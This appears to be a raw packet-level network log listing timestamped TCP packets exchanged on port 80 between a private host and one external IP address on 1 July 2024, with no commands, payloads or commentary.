Jul 1, 2024 13:02:13.439718962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.439743042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.439886093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439902067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439917088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439924955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.439934015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.439960003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.439995050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.440258026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.440310955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442389011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442449093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442450047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442465067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442485094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442502022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442698002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442713976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442728043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442749023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442750931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.442759991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442774057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.442790985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.445175886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445225954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.445255041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445270061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445346117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.445549965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445564985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445579052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445593119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.445600033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.445620060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.445645094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447413921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447458029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447470903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447487116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447515965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447539091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447727919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447743893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447758913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447773933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.447776079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447796106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.447813034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449096918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449141026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449165106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449177980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449201107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449215889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449341059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449356079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449369907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449383020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449387074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449399948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449419022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.449738026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.449778080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452296972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452347040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452364922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452409983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452497005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452533007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452569008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452584028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452598095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452622890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452641964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452666044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452892065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452905893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.452935934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.452963114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454251051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454263926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454292059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454307079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454307079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454324007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454333067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454355001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454530001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454545975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454560041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.454569101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454586029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.454602003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.470927954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.470988035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471020937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471054077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471201897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471235991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471235991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471247911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471280098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471484900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471518040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471533060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471561909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.471645117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.471693039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472429037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472492933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472549915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472583055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472595930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472623110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472748995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472796917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472887039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472920895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472935915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472955942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472958088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.472985029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.472994089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.473023891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.494697094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.494767904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.494791985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.494824886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.494839907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.494873047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.495099068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.495131969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.495143890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.495165110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.495168924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.495199919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.495204926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.495242119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.501508951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501554966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.501708984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501743078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501750946 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.501784086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.501898050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501929998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501964092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.501966000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.501983881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.502005100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.502012968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.502043962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505316973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505367041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505438089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505474091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505481958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505517006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505726099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505757093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505776882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505790949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505796909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505825043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.505830050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.505862951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516047955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516099930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516102076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516132116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516144991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516257048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516315937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516349077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516360998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516381025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516390085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516419888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516415119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516468048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.516768932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.516813993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521223068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521276951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521280050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521311045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521320105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521349907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521486044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521532059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521536112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521569967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521598101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521603107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.521606922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.521650076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525333881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525384903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525427103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525468111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525474072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525518894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525640011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525674105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525687933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525708914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525727987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525748014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.525955915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.525996923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.530566931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530615091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.530673981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530708075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530719042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.530749083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.530896902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530929089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530951977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.530962944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.530966997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.531023026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.531184912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.531224012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534297943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534351110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534365892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534398079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534410000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534446001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534518003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534559965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534569025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534601927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534610033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534635067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534643888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534677029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.534939051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.534989119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.536878109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.536928892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.536933899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.536968946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.536978960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.537009954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.537128925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.537161112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.537170887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.537194967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.537203074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.537235975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.537426949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.537473917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539371967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539418936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539424896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539460897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539542913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539585114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539623976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539638996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539660931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539679050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539920092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539933920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539948940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.539959908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.539980888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.540000916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542018890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542062998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542104006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542119026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542146921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542164087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542339087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542361975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542376995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542377949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542392015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.542396069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542414904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.542429924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.543771029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.543812037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.543848038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.543863058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.543884039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.543900967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.544035912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.544049978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.544064999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.544073105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.544080019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.544099092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.544116020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.544440031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.544487000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547077894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547122955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547123909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547158957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547168970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547202110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547324896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547339916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547364950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547382116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547533989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547549009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547563076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.547573090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547590971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.547605038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.548789024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.548832893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.548865080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.548878908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.548904896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.548919916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.549052954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.549067974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.549093008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.549107075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.549266100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.549280882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.549295902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.549304008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.549324036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.549335957 CEST	49705	80	192.168.2.5	147.45.78.162
